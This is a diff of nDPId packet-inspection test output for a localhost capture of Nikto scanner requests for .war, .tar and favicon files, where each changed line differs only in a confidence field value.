00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277347,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ZRVAAEAG1yF\/AAABfwAAAcTgH5Bb9F2rFITQsoAYAED+swAAAQEICp1m\/YudZv2LR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277349,"pkt":"AAAAAAAAAAAAAAAACABFAADCefJAAEAGwkF\/AAABfwAAAcTiH5DNN0FKl3iI04AYAED+tgAAAQEICp1m\/Y2dZv2MR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277350,"pkt":"AAAAAAAAAAAAAAAACABFAADCI4FAAEAGGLN\/AAABfwAAAcTkH5CTwxvH1PwL8oAYAED+tgAAAQEICp1m\/Y6dZv2OR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277352,"pkt":"AAAAAAAAAAAAAAAACABFAADBrJpAAEAGj5p\/AAABfwAAAcTmH5B1JpQjd4rcfoAYAED+tQAAAQEICp1m\/ZCdZv2QR0VUIC9mYXZpY29uLmljbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277354,"pkt":"AAAAAAAAAAAAAAAACABFAADKIPlAAEAGGzN\/AAABfwAAAcToH5DzJBhOnEiKeoAYAED+vgAAAQEICp1m\/ZKdZv2SR0VUIC9mYXZpY29ucy9mYXZpY29uLmljbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277355,"pkt":"AAAAAAAAAAAAAAAACABFAADBHndAAEAGHb5\/AAABfwAAAcTqH5Ag4SbPDIJk5IAYAED+tQAAAQEICp1m\/ZOdZv2TR0VUIC9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277357,"pkt":"AAAAAAAAAAAAAAAACABFAADKgAdAAEAGvCR\/AAABfwAAAcTsH5DBK7i\/eaGnm4AYAED+vgAAAQEICp1m\/ZWdZv2UR0VUIC9mYXZpY29ucy9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277358,"pkt":"AAAAAAAAAAAAAAAACABFAADByl9AAEAGcdV\/AAABfwAAAcTuH5C2YPLn77QmvYAYAED+tQAAAQEICp1m\/ZadZv2WR0VUIC9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 